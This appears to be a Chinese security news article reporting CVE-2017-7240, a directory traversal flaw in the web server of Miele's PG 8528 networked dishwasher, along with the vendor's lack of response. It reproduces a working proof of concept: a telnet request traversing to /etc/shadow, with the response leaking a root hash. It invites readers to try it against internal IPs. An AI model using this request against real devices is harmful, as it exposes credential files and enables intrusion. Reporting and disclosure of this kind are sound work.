E安全3月27日讯 随着最近几年物联网和智能家居的普及,洗碗机这种家电类型开始被越来越多的人所接受。但是最近德国高端家电厂商美诺(Miele)旗下的洗碗机却被爆存在“目录遍历漏洞”!
别说没人警告过!联网家电存在风险!
德国美诺(Miele)洗碗机给洗碗机配置了网络服务器,实现了全物联网。其近日则因美诺专业PG 8528——网络服务器目录遍历而出现在一则漏洞披露报告中,该漏洞在通用漏洞及披露数据库中的代码为CVE-2017-7240。
响应的嵌入式Web服务器‘PST10 WebServer’通常会侦听端口80,并且有倾向实施目录遍历攻击,因此,未经身份的攻击者也许可以利用该漏洞访问敏感信息,以进行后续攻击。
美诺(Miele)全物联网洗碗机当属懒人界的一大神器,若您也购买了如此高端大气上档次的洗碗机,您自己也可以轻松验证该漏洞:
get /../../../../../../../../../../../../etc/shadow
HTTP/1.1 to 192.168.0.1(任何一个你想访问的内网IP)
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::
目录遍历(directory traversal)攻击允许犯罪分子访问目录,而非网络服务器需要的内容。一旦这些犯罪分子获取这些目录,他们便可以任意插入代码,并让网络服务器执行。
目前尚不清楚,美诺的哪些库被用来搭建网络服务器,这就意味着,美诺暂未修复漏洞。对于洗碗机,最好是确保设备未暴露在互联网上。
联网电器制造公司大多没有漏洞修复流程
发现该洗碗机的网络服务器的研究人员施耐德和Wulf EDV-Beratung GmbH & Co. KG公司的Jens Regel抱怨称,美诺从未响应他发出的通知。2016年11月他曾第一次于通知了美诺公司。
由于美诺是一家设备公司,而不是纯粹的IT公司,因此并没有报告或修复漏洞的流程。
专家建议家电制造商:如果并非自己所长,尽量不要将设备联网。
在中国,有大量的家电制造商也在推出“炫酷”的联网智能电器,包括WIFI连接的豆浆机、电饭煲等等。用户目前还沉侵在这些电器带来的便捷的轻松生活之中,而未注意到物联网的危害已悄悄袭来。
而联网的智能电器制造商在电器的制造过程中也应该更多关注网络安全的问题。
E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day
文章评论